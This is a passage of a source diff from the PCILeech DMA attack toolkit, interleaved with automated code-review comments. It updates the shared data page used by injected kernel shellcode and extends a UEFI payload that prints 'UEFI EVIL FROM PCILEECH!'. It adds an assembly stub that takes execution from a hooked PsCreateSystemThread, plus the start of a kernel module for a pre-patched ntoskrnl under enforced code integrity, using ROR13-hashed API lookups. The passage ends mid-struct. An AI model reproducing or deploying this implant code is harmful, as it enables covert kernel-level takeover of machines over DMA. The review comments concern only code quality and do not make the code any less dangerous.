@@ -98,7 +98,7 @@ typedef struct tdFNOSX { // function pointers to OSX functions (used in main con
QWORD memset;
QWORD vm_protect;
QWORD ReservedFutureUse[21];
-} FNOSX, *PFNOSX;
+} FNMACOS, *PFNMACOS;
#define KMDDATA_OPERATING_SYSTEM_MACOS 0x04
@@ -106,33 +106,33 @@ typedef struct tdFNOSX { // function pointers to OSX functions (used in main con
* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
* This page/struct is used to communicate between the inserted kernel code and
* the pcileech program.
-* VNR: 002
+* VNR: 003
*/
typedef struct tdKMDDATA {
QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
- QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/MACOS).
+ QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
QWORD AddrKallsymsLookupName; // [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
QWORD DMASizeBuffer; // [0x018] size of DMA buffer.
QWORD DMAAddrPhysical; // [0x020] physical address of DMA buffer.
QWORD DMAAddrVirtual; // [0x028] virtual address of DMA buffer.
QWORD _status; // [0x030] status of operation
QWORD _result; // [0x038] result of operation TRUE|FALSE
- QWORD _address; // [0x040] virtual address to operate on.
+ QWORD _address; // [0x040] address to operate on.
QWORD _size; // [0x048] size of operation / data in DMA buffer.
QWORD OperatingSystem; // [0x050] operating system type
- QWORD ReservedKMD; // [0x058] reserved for specific kmd data (dependant on KMD version).
- QWORD ReservedFutureUse1[20]; // [0x060] reserved for future use.
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
QWORD dataInExtraLength; // [0x100] length of extra in-data.
QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
QWORD dataInConsoleBuffer; // [0x118] physical address of 1-page console buffer.
QWORD dataIn[28]; // [0x120]
- QWORD dataOutExtraLength; // [0x200] length of extra in-data.
+ QWORD dataOutExtraLength; // [0x200] length of extra out-data.
QWORD dataOutExtraOffset; // [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
- QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra in-data.
+ QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra out-data.
QWORD dataOutConsoleBuffer; // [0x218] physical address of 1-page console buffer.
QWORD dataOut[28]; // [0x220]
- FNOSX fn; // [0x300] used by shellcode to store function pointers.
+ FNMACOS fn; // [0x300] used by shellcode to store function pointers.
CHAR dataInStr[MAX_PATH]; // [0x400] string in-data
CHAR ReservedFutureUse2[252];
CHAR dataOutStr[MAX_PATH]; // [0x600] string out-data
@@ -239,7 +239,7 @@ VOID stage3_c_EntryPoint(PKMDDATA pk)
}
*(PQWORD)(qwPT_VA + 0x0000) = 0x0000000000000023 | (qwPT_PA + 0x1000); // PDPT -> PD
*(PQWORD)(VM_MIN_KERNEL_ADDRESS + (qwCR3 & 0x00000000fffff000) + 0xEE8) = 0x0000000000000023 | qwPT_PA; // PML4 -> PDPT
- pk->ReservedKMD = qwPT_VA;
+ pk->ReservedKMD[0] = qwPT_VA;
// 3: main command loop.
while(TRUE) {
pk->_status = 1;
diff --git a/pcileech_shellcode/pcileech_shellcode.vcxproj b/pcileech_shellcode/pcileech_shellcode.vcxproj
index 6540119..c28983c 100644
--- a/pcileech_shellcode/pcileech_shellcode.vcxproj
+++ b/pcileech_shellcode/pcileech_shellcode.vcxproj
@@ -66,6 +66,8 @@
+
+
@@ -95,6 +97,7 @@
+
diff --git a/pcileech_shellcode/pcileech_shellcode.vcxproj.filters b/pcileech_shellcode/pcileech_shellcode.vcxproj.filters
index f7dc13c..ea36919 100644
--- a/pcileech_shellcode/pcileech_shellcode.vcxproj.filters
+++ b/pcileech_shellcode/pcileech_shellcode.vcxproj.filters
@@ -135,6 +135,12 @@
Source Files\test
+
+ Source Files\exec
+
+
+ Source Files\exec
+
@@ -203,6 +209,9 @@
Source Files\kmd_core
+
+ Source Files\exec
+
diff --git a/pcileech_shellcode/uefi_common.h b/pcileech_shellcode/uefi_common.h
index b2950b7..19fc6d2 100644
--- a/pcileech_shellcode/uefi_common.h
+++ b/pcileech_shellcode/uefi_common.h
@@ -14,11 +14,12 @@
typedef void VOID, *PVOID;
typedef int BOOL, *PBOOL;
typedef unsigned char BYTE, *PBYTE;
-typedef char CHAR, *PCHAR;
+typedef char CHAR, *PCHAR, *LPSTR;
typedef unsigned short WCHAR, *PWCHAR;
typedef unsigned short WORD, *PWORD;
-typedef unsigned long DWORD, *PDWORD;
-typedef unsigned __int64 QWORD, *PQWORD;
+typedef unsigned long DWORD, *PDWORD, LONG;
+typedef __int64 LONGLONG;
+typedef unsigned __int64 QWORD, *PQWORD, ULONGLONG;
typedef void *HANDLE;
typedef unsigned long STATUS;
#define NULL ((void *)0)
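Review bot: `typedef unsigned long DWORD, *PDWORD, LONG;` makes `LONG` an unsigned type, whereas in the Windows headers this file mirrors it is a signed `long`; the only user in this commit, `LONG e_lfanew` in the new `IMAGE_DOS_HEADER` further down this file, therefore changes sign relative to the reference definition. If the unsigned form is intentional (it does rule out a negative `e_lfanew`) it deserves a comment saying so; otherwise declare it separately as `typedef long LONG;`. Either way, folding `LONG` into the `DWORD` declarator line hides the mismatch, so putting it on its own line is worth doing regardless.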
@@ -27,35 +28,37 @@ typedef unsigned long STATUS;
#define FALSE 0
#define UNREFERENCED_PARAMETER(P) (P)
#define LOOKUP_FUNCTION(pk, szFn) (SysVCall(pk->AddrKallsymsLookupName, szFn))
+#define min(a, b) ((a < b) ? a : b)
+#define max(a, b) ((a > b) ? a : b)
/*
-* KMD DATA struct. This struct must be contained in a 4096 byte section (page)
-* at the most. This data struct is used to communicate between the inserted
-* kernel code and the DMA reader/writer.
-* VNR: 002
+* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
+* This page/struct is used to communicate between the inserted kernel code and
+* the pcileech program.
+* VNR: 003
*/
typedef struct tdKMDDATA {
QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
- QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/OSX).
+ QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
QWORD AddrKallsymsLookupName; // [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
QWORD DMASizeBuffer; // [0x018] size of DMA buffer.
QWORD DMAAddrPhysical; // [0x020] physical address of DMA buffer.
QWORD DMAAddrVirtual; // [0x028] virtual address of DMA buffer.
- QWORD _status; // [0x030]
- QWORD _result; // [0x038]
- QWORD _address; // [0x040] virtual address to operate on.
+ QWORD _status; // [0x030] status of operation
+ QWORD _result; // [0x038] result of operation TRUE|FALSE
+ QWORD _address; // [0x040] address to operate on.
QWORD _size; // [0x048] size of operation / data in DMA buffer.
QWORD OperatingSystem; // [0x050] operating system type
- QWORD ReservedKMD; // [0x058] reserved for specific kmd data (dependant on KMD version).
- QWORD ReservedFutureUse1[20]; // [0x060] reserved for future use.
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
QWORD dataInExtraLength; // [0x100] length of extra in-data.
QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
QWORD dataInConsoleBuffer; // [0x118] physical address of 1-page console buffer.
QWORD dataIn[28]; // [0x120]
- QWORD dataOutExtraLength; // [0x200] length of extra in-data.
+ QWORD dataOutExtraLength; // [0x200] length of extra out-data.
QWORD dataOutExtraOffset; // [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
- QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra in-data.
+ QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra out-data.
QWORD dataOutConsoleBuffer; // [0x218] physical address of 1-page console buffer.
QWORD dataOut[28]; // [0x220]
PVOID fn[32]; // [0x300] used by shellcode to store function pointers.
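Review bot: The new `min`/`max` macros do not parenthesise their arguments, so an operand such as `a | b` or `x ? y : z` binds wrongly against `<`/`>`, and each operand is evaluated twice, which matters as soon as a side-effecting or volatile expression is passed (the caller added in uefi_textout.c already re-evaluates `pk->dataIn[3]` on every loop iteration). Change them to `#define min(a, b) (((a) < (b)) ? (a) : (b))` and `#define max(a, b) (((a) > (b)) ? (a) : (b))`; a `static` inline helper would avoid the double evaluation entirely if the build allows it.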
@@ -100,8 +103,8 @@ extern VOID SetMem(
QWORD Value);
extern VOID CopyMem(
- QWORD *Destination,
- QWORD *Source,
+ VOID *Destination,
+ VOID *Source,
QWORD Length);
extern QWORD LocateProtocol(
@@ -158,16 +161,134 @@ typedef struct {
} SIMPLE_TEXT_OUTPUT_MODE;
typedef struct _EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL {
- QWORD Reset;
+ QWORD(*Reset)(QWORD *This, QWORD *ExtendedVerification);
QWORD(*OutputString)(QWORD *This, WCHAR *String);
- QWORD TestString;
- QWORD QueryMode;
- QWORD SetMode;
+ QWORD(*TestString)(QWORD *This, WCHAR *String);
+ QWORD(*QueryMode)(QWORD *This, QWORD ModeNumber, QWORD *Columns, QWORD *Rows);
+ QWORD(*SetMode)(QWORD *This, QWORD ModeNumber);
QWORD(*SetAttribute)(QWORD *This, QWORD Attribute);
QWORD(*ClearScreen)(QWORD *This);
- QWORD SetCursorPosition;
- QWORD EnableCursor;
+ QWORD(*SetCursorPosition)(QWORD *This, QWORD Column, QWORD Row);
+ QWORD(*EnableCursor)(QWORD *This, QWORD Visible);
SIMPLE_TEXT_OUTPUT_MODE *Mode;
} EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL;
+//-------------------------------------------------------------------------------
+// PE / Windows defines below:
+//-------------------------------------------------------------------------------
+
+#define IMAGE_DIRECTORY_ENTRY_EXPORT 0 // Export Directory
+#define IMAGE_DOS_SIGNATURE 0x5A4D // MZ
+#define IMAGE_NT_SIGNATURE 0x00004550 // PE00
+#define IMAGE_NUMBEROF_DIRECTORY_ENTRIES 16
+#define PIMAGE_NT_HEADERS PIMAGE_NT_HEADERS64
+
+typedef struct _IMAGE_DOS_HEADER {
+ WORD e_magic;
+ WORD e_cblp;
+ WORD e_cp;
+ WORD e_crlc;
+ WORD e_cparhdr;
+ WORD e_minalloc;
+ WORD e_maxalloc;
+ WORD e_ss;
+ WORD e_sp;
+ WORD e_csum;
+ WORD e_ip;
+ WORD e_cs;
+ WORD e_lfarlc;
+ WORD e_ovno;
+ WORD e_res[4];
+ WORD e_oemid;
+ WORD e_oeminfo;
+ WORD e_res2[10];
+ LONG e_lfanew;
+} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;
+
+typedef struct _IMAGE_EXPORT_DIRECTORY {
+ DWORD Characteristics;
+ DWORD TimeDateStamp;
+ WORD MajorVersion;
+ WORD MinorVersion;
+ DWORD Name;
+ DWORD Base;
+ DWORD NumberOfFunctions;
+ DWORD NumberOfNames;
+ DWORD AddressOfFunctions;
+ DWORD AddressOfNames;
+ DWORD AddressOfNameOrdinals;
+} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;
+
+typedef struct _IMAGE_FILE_HEADER {
+ WORD Machine;
+ WORD NumberOfSections;
+ DWORD TimeDateStamp;
+ DWORD PointerToSymbolTable;
+ DWORD NumberOfSymbols;
+ WORD SizeOfOptionalHeader;
+ WORD Characteristics;
+} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;
+
+typedef struct _IMAGE_DATA_DIRECTORY {
+ DWORD VirtualAddress;
+ DWORD Size;
+} IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;
+
+typedef struct _IMAGE_OPTIONAL_HEADER64 {
+ WORD Magic;
+ BYTE MajorLinkerVersion;
+ BYTE MinorLinkerVersion;
+ DWORD SizeOfCode;
+ DWORD SizeOfInitializedData;
+ DWORD SizeOfUninitializedData;
+ DWORD AddressOfEntryPoint;
+ DWORD BaseOfCode;
+ ULONGLONG ImageBase;
+ DWORD SectionAlignment;
+ DWORD FileAlignment;
+ WORD MajorOperatingSystemVersion;
+ WORD MinorOperatingSystemVersion;
+ WORD MajorImageVersion;
+ WORD MinorImageVersion;
+ WORD MajorSubsystemVersion;
+ WORD MinorSubsystemVersion;
+ DWORD Win32VersionValue;
+ DWORD SizeOfImage;
+ DWORD SizeOfHeaders;
+ DWORD CheckSum;
+ WORD Subsystem;
+ WORD DllCharacteristics;
+ ULONGLONG SizeOfStackReserve;
+ ULONGLONG SizeOfStackCommit;
+ ULONGLONG SizeOfHeapReserve;
+ ULONGLONG SizeOfHeapCommit;
+ DWORD LoaderFlags;
+ DWORD NumberOfRvaAndSizes;
+ IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
+} IMAGE_OPTIONAL_HEADER64, *PIMAGE_OPTIONAL_HEADER64;
+
+typedef struct _IMAGE_NT_HEADERS64 {
+ DWORD Signature;
+ IMAGE_FILE_HEADER FileHeader;
+ IMAGE_OPTIONAL_HEADER64 OptionalHeader;
+} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;
+
+#define IMAGE_SIZEOF_SHORT_NAME 8
+
+typedef struct _IMAGE_SECTION_HEADER {
+ BYTE Name[IMAGE_SIZEOF_SHORT_NAME];
+ union {
+ DWORD PhysicalAddress;
+ DWORD VirtualSize;
+ } Misc;
+ DWORD VirtualAddress;
+ DWORD SizeOfRawData;
+ DWORD PointerToRawData;
+ DWORD PointerToRelocations;
+ DWORD PointerToLinenumbers;
+ WORD NumberOfRelocations;
+ WORD NumberOfLinenumbers;
+ DWORD Characteristics;
+} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;
+
#endif /* __UEFI_COMMON_H__ */
diff --git a/pcileech_shellcode/uefi_kmd_c.c b/pcileech_shellcode/uefi_kmd_c.c
index 733698e..3b10405 100644
--- a/pcileech_shellcode/uefi_kmd_c.c
+++ b/pcileech_shellcode/uefi_kmd_c.c
@@ -101,30 +101,30 @@ typedef struct tdPHYSICAL_MEMORY_RANGE {
* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
* This page/struct is used to communicate between the inserted kernel code and
* the pcileech program.
-* VNR: 002
+* VNR: 003
*/
typedef struct tdKMDDATA {
QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
- QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/MACOS).
+ QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
QWORD AddrKallsymsLookupName; // [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
QWORD DMASizeBuffer; // [0x018] size of DMA buffer.
QWORD DMAAddrPhysical; // [0x020] physical address of DMA buffer.
QWORD DMAAddrVirtual; // [0x028] virtual address of DMA buffer.
QWORD _status; // [0x030] status of operation
QWORD _result; // [0x038] result of operation TRUE|FALSE
- QWORD _address; // [0x040] virtual address to operate on.
+ QWORD _address; // [0x040] address to operate on.
QWORD _size; // [0x048] size of operation / data in DMA buffer.
QWORD OperatingSystem; // [0x050] operating system type
- QWORD ReservedKMD; // [0x058] reserved for specific kmd data (dependant on KMD version).
- QWORD ReservedFutureUse1[20]; // [0x060] reserved for future use.
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
QWORD dataInExtraLength; // [0x100] length of extra in-data.
QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
QWORD dataInConsoleBuffer; // [0x118] physical address of 1-page console buffer.
QWORD dataIn[28]; // [0x120]
- QWORD dataOutExtraLength; // [0x200] length of extra in-data.
+ QWORD dataOutExtraLength; // [0x200] length of extra out-data.
QWORD dataOutExtraOffset; // [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
- QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra in-data.
+ QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra out-data.
QWORD dataOutConsoleBuffer; // [0x218] physical address of 1-page console buffer.
QWORD dataOut[28]; // [0x220]
PVOID fn[32]; // [0x300] used by shellcode to store function pointers.
@@ -230,8 +230,8 @@ VOID c_EntryPoint(PKMDDATA pk, QWORD paUEFI_IBI_SYST)
SetMem((PQWORD)pk, 0x1000, 0);
pk->MAGIC = 0x0ff11337711333377;
pk->OperatingSystem = KMDDATA_OPERATING_SYSTEM_UEFI;
- pk->ReservedKMD = paUEFI_IBI_SYST; // Address of UEFI system table
- // 1: allocate memory for buffer
+ pk->ReservedKMD[0] = paUEFI_IBI_SYST; // Address of UEFI system table
+ // 2: allocate memory for buffer
addr = 0xffffffff;
pk->DMASizeBuffer = 0x01000000;
status = AllocatePages(1, EfiBootServicesData, 0x1000, &addr);
@@ -246,9 +246,9 @@ VOID c_EntryPoint(PKMDDATA pk, QWORD paUEFI_IBI_SYST)
}
pk->DMAAddrPhysical = addr;
pk->DMAAddrVirtual = addr;
- // 2: disable any watchdog timer (if exists)
+ // 3: disable any watchdog timer (if exists)
pk->dataOut[2] = SetWatchdogTimer(0, 0, 0, 0);
- // 3: main command loop.
+ // 4: main command loop.
while(TRUE) {
pk->_status = 1;
if (KMD_CMD_COMPLETED == pk->_op) { // NOP
diff --git a/pcileech_shellcode/uefi_textout.c b/pcileech_shellcode/uefi_textout.c
index fa13370..801cf91 100644
--- a/pcileech_shellcode/uefi_textout.c
+++ b/pcileech_shellcode/uefi_textout.c
@@ -7,14 +7,14 @@
// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel uefi_common.c
// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel uefi_textout.c
// ml64.exe uefi_common_a.asm /Feuefi_textout.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main uefi_textout.obj uefi_common.obj
-// shellcode64.exe -o uefi_textout.exe "UEFI TEST PROGRAM - PRINT STUFF ON THE SCREEN\n===========================================================\nSyntax: pcileech.exe -s \nGENERAL INFORMATION BELOW:\n TEXT : %s\n"
+// shellcode64.exe -o uefi_textout.exe "UEFI TEST PROGRAM - PRINT STUFF ON THE SCREEN\n===========================================================\nSyntax: pcileech.exe uefi_textout\nOptions (optional): \ntext: -s \nposition: -0 1 -1 -2 \nnumber of runs (default=1): -3 \nGENERAL INFORMATION BELOW:\n TEXT : %s\n"
//
#include "uefi_common.h"
VOID c_EntryPoint(PKMDDATA pk)
{
WCHAR szPrint[MAX_PATH];
- CHAR *szSrc, szPrintDefault[] = { ' ', ' ', ' ', 'U', 'E', 'F', 'I', ' ', 'E', 'V', 'I', 'L', ' ', 'I', 'N', ' ', 'B', 'O', 'O', 'T', ' ', 'S', 'E', 'R', 'V', 'I', 'C', 'E', 'S', '!', ' ', ' ', ' ', 0 };
+ CHAR *szSrc, szPrintDefault[] = { ' ', ' ', ' ', ' ', 'U', 'E', 'F', 'I', ' ', 'E', 'V', 'I', 'L', ' ', 'F', 'R', 'O', 'M', ' ', 'P', 'C', 'I', 'L', 'E', 'E', 'C', 'H', '!', ' ', ' ', ' ' , ' ', 0 };
EFI_GUID GUID_EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL = EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL_GUID;
EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL oOut;
EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL *pOut = &oOut;
@@ -27,7 +27,12 @@ VOID c_EntryPoint(PKMDDATA pk)
}
pk->dataOut[0] = efi_status = LocateProtocol(&GUID_EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL, NULL, (QWORD**)&pOut);
if(!efi_status) {
+ if(pk->dataIn[0]) {
+ pOut->SetCursorPosition((QWORD*)pOut, pk->dataIn[1], pk->dataIn[2]);
+ }
pOut->SetAttribute((QWORD*)pOut, EFI_BACKGROUND_RED | EFI_CYAN);
- pOut->OutputString((QWORD*)pOut, szPrint);
+ for(i = 0; i < max(1, pk->dataIn[3]); i++) {
+ pOut->OutputString((QWORD*)pOut, szPrint);
+ }
}
}
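Review bot: The run count `pk->dataIn[3]` and the cursor position `pk->dataIn[1]`/`pk->dataIn[2]` come from the host unchecked: `max(1, pk->dataIn[3])` is a 64-bit bound, so if `i` (declared outside the hunk; `c_EntryPoint` begins before it) is narrower than `QWORD` a value beyond `i`'s range never terminates the loop, and a merely large value keeps the firmware busy with no way to interrupt it. Clamp the count once before the loop, e.g. `QWORD cRuns = pk->dataIn[3] ? min(pk->dataIn[3], RUNS_MAX_PLACEHOLDER) : 1;` with a named limit in place of the placeholder, and use `cRuns` as the bound instead of re-evaluating the macro each iteration. The status returned by `SetCursorPosition` is also dropped; per the UEFI spec it reports a row/column unsupported by the current mode, so storing it in a `dataOut` slot the way the `LocateProtocol` result is would make a silently ignored position visible to the host.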
diff --git a/pcileech_shellcode/uefi_winload_ntos_kmd.asm b/pcileech_shellcode/uefi_winload_ntos_kmd.asm
new file mode 100644
index 0000000..0075efe
--- /dev/null
+++ b/pcileech_shellcode/uefi_winload_ntos_kmd.asm
@@ -0,0 +1,88 @@
+; uefi_winload_ntos_kmd.asm : assembly to receive execution from hooked function PsCreateSystemThread at end of execution (instead of RET)
+;
+; (c) Ulf Frisk, 2017
+; Author: Ulf Frisk, pcileech@frizk.net
+;
+
+EXTRN c_EntryPoint:NEAR
+
+.CODE
+
+main PROC
+ JMP main_setup
+main ENDP
+
+data_trigger_count db 00h, 00h ; offset 0x02
+addr_base_ntos dd 00000000h ; offset 0x04
+addr_this dd 00000000h ; offset 0x08
+addr_sym0 dd 00000000h ; offset 0x0c
+addr_sym1 dd 00000000h ; offset 0x10
+addr_sym2 dd 00000000h ; offset 0x14
+
+main_setup PROC
+ PUSH rax
+ ; ----------------------------------------------------
+ ; only continue of running at IRQL PASSIVE_LEVEL
+ ; ----------------------------------------------------
+ MOV rax, cr8
+ TEST al, al
+ JNZ main_setup_exit
+ ; ----------------------------------------------------
+ ; save registers (14regs)
+ ; ----------------------------------------------------
+ PUSH rbx
+ PUSH rcx
+ PUSH rdx
+ PUSH rdi
+ PUSH rsi
+ PUSH r8
+ PUSH r9
+ PUSH r10
+ PUSH r11
+ PUSH r12
+ PUSH r13
+ PUSH r14
+ PUSH r15
+ PUSH rbp
+ ; ----------------------------------------------------
+ ; fetch ntos base, vfs addr, cr3, align stack, jump to c-code
+ ; ----------------------------------------------------
+ LEA rcx, [main]
+ MOV eax, [addr_this]
+ SUB rcx, rax
+ MOV eax, [addr_base_ntos]
+ ADD rcx, rax
+ LEA rdx, [main]
+ MOV r8, cr3
+ MOV r15, rsp
+ SUB rsp, 100h
+ SHR rsp, 4
+ SHL rsp, 4
+ CALL c_EntryPoint
+ MOV rsp, r15
+ ; ----------------------------------------------------
+ ; restore registers
+ ; ----------------------------------------------------
+ POP rbp
+ POP r15
+ POP r14
+ POP r13
+ POP r12
+ POP r11
+ POP r10
+ POP r9
+ POP r8
+ POP rsi
+ POP rdi
+ POP rdx
+ POP rcx
+ POP rbx
+ ; ----------------------------------------------------
+ ; return
+ ; ----------------------------------------------------
+ main_setup_exit:
+ POP rax
+ RET
+main_setup ENDP
+
+END
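Review bot: The `offset 0x02`…`0x14` comments on the data words after `main` hold only if `JMP main_setup` assembles to the two-byte short form; MASM may choose the five-byte near encoding for a forward reference across a PROC boundary, which would shift every offset by three and break whatever patches `addr_this`/`addr_base_ntos` by offset. Writing `JMP SHORT main_setup` pins the encoding, so the assembler errors instead of silently growing the stub. Two smaller points: `data_trigger_count` is declared but never referenced in this file, so a comment saying who reads or writes it would help, and the comment `only continue of running at IRQL PASSIVE_LEVEL` should read `only continue if running at IRQL PASSIVE_LEVEL`.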
diff --git a/pcileech_shellcode/uefi_winload_ntos_kmd_c.c b/pcileech_shellcode/uefi_winload_ntos_kmd_c.c
new file mode 100644
index 0000000..abbcd65
--- /dev/null
+++ b/pcileech_shellcode/uefi_winload_ntos_kmd_c.c
@@ -0,0 +1,431 @@
+// uefi_winload_ntos_kmd_c.c : special kmd for use in pre-patched ntoskrnl.exe with VBS enforced code integrity
+//
+// (planned to be used in demo at 34c3)
+//
+// (c) Ulf Frisk, 2017
+// Author: Ulf Frisk, pcileech@frizk.net
+//
+// compile with:
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel uefi_winload_ntos_kmd_c.c
+// ml64.exe uefi_winload_ntos_kmd.asm /Feuefi_winload_ntos_kmd.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main uefi_winload_ntos_kmd_c.obj
+// shellcode64.exe -o uefi_winload_ntos_kmd.exe
+//
+#include
+#pragma warning( disable : 4047 4055 4127)
+
+typedef unsigned __int64 QWORD, *PQWORD;
+typedef __int64 PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;
+
+// ----------------------------- KERNEL DEFINES AND TYPEDEFS BELOW -----------------------------
+
+typedef struct _CLIENT_ID {
+ HANDLE UniqueProcess;
+ HANDLE UniqueThread;
+} CLIENT_ID;
+typedef CLIENT_ID *PCLIENT_ID;
+
+typedef _IRQL_requires_same_ _Function_class_(KSTART_ROUTINE) VOID KSTART_ROUTINE(
+ _In_ PVOID StartContext
+);
+typedef KSTART_ROUTINE *PKSTART_ROUTINE;
+
+typedef struct _UNICODE_STRING {
+ USHORT Length;
+ USHORT MaximumLength;
+ _Field_size_bytes_part_(MaximumLength, Length) PWCH Buffer;
+} UNICODE_STRING;
+typedef UNICODE_STRING *PUNICODE_STRING;
+
+typedef struct _OBJECT_ATTRIBUTES {
+ ULONG Length;
+ HANDLE RootDirectory;
+ PUNICODE_STRING ObjectName;
+ ULONG Attributes;
+ PVOID SecurityDescriptor;
+ PVOID SecurityQualityOfService;
+} OBJECT_ATTRIBUTES;
+typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
+typedef CONST OBJECT_ATTRIBUTES *PCOBJECT_ATTRIBUTES;
+
+typedef enum _MEMORY_CACHING_TYPE {
+ MmNonCached = 0,
+ MmCached = 1,
+ MmWriteCombined = 2,
+ MmHardwareCoherentCached = 3,
+ MmNonCachedUnordered = 4,
+ MmUSWCCached = 5,
+ MmMaximumCacheType = 6
+} MEMORY_CACHING_TYPE;
+
+typedef struct _PHYSICAL_MEMORY_RANGE {
+ PHYSICAL_ADDRESS BaseAddress;
+ LARGE_INTEGER NumberOfBytes;
+} PHYSICAL_MEMORY_RANGE, *PPHYSICAL_MEMORY_RANGE;
+
+typedef enum _MODE {
+ KernelMode,
+ UserMode,
+ MaximumMode
+} MODE;
+
+// ----------------------------- ROR13 HASHES BELOW -----------------------------
+
+#define H_ExFreePool 0x9d489d1f
+#define H_MmAllocateContiguousMemory 0x9f361ebc
+#define H_MmFreeContiguousMemory 0x1345f592
+#define H_MmGetPhysicalAddress 0x5a326357
+#define H_MmGetPhysicalMemoryRanges 0x4977a56f
+#define H_MmMapIoSpace 0x05ddbef9
+#define H_MmUnmapIoSpace 0x6c6ec5c9
+#define H_PsCreateSystemThread 0x94a06b02
+#define H_RtlCopyMemory 0xcf64979b
+#define H_RtlZeroMemory 0xc53d4fdb
+#define H_ZwProtectVirtualMemory 0xbc3f4d89
+#define H_KeDelayExecutionThread 0x58586d92
+#define H_RtlZeroMemory 0xc53d4fdb
+
+// ----------------------------- SHELLCODE DEFINES AND TYPEDEFS BELOW (STAGE2) -----------------------------
+
+#undef RtlCopyMemory
+#undef RtlZeroMemory
+typedef struct tdNTOS {
+ VOID(*ExFreePool)(
+ _In_ PVOID P
+ );
+ VOID(*MmFreeContiguousMemory)(
+ _In_ PVOID BaseAddress
+ );
+ PVOID(*MmAllocateContiguousMemory)(
+ _In_ SIZE_T NumberOfBytes,
+ _In_ PHYSICAL_ADDRESS HighestAcceptableAddress
+ );
+ PHYSICAL_ADDRESS(*MmGetPhysicalAddress)(
+ _In_ PVOID BaseAddress
+ );
+ PPHYSICAL_MEMORY_RANGE(*MmGetPhysicalMemoryRanges)(
+ VOID
+ );
+ PVOID(*MmMapIoSpace)(
+ _In_ PHYSICAL_ADDRESS PhysicalAddress,
+ _In_ SIZE_T NumberOfBytes,
+ _In_ MEMORY_CACHING_TYPE CacheType
+ );
+ VOID(*MmUnmapIoSpace)(
+ _In_ PVOID BaseAddress,
+ _In_ SIZE_T NumberOfBytes
+ );
+ NTSTATUS(*PsCreateSystemThread)(
+ _Out_ PHANDLE ThreadHandle,
+ _In_ ULONG DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_opt_ HANDLE ProcessHandle,
+ _Out_opt_ PCLIENT_ID ClientId,
+ _In_ PKSTART_ROUTINE StartRoutine,
+ _In_opt_ PVOID StartContext
+ );
+ VOID(*RtlCopyMemory)(
+ _Out_ VOID UNALIGNED *Destination,
+ _In_ const VOID UNALIGNED *Source,
+ _In_ SIZE_T Length
+ );
+ NTSTATUS(*ZwProtectVirtualMemory)(
+ _In_ HANDLE ProcessHandle,
+ _Inout_ PVOID *BaseAddress,
+ _Inout_ PSIZE_T RegionSize,
+ _In_ ULONG NewProtect,
+ _Out_ PULONG OldProtect
+ );
+ NTSTATUS(*KeDelayExecutionThread)(
+ _In_ MODE WaitMode,
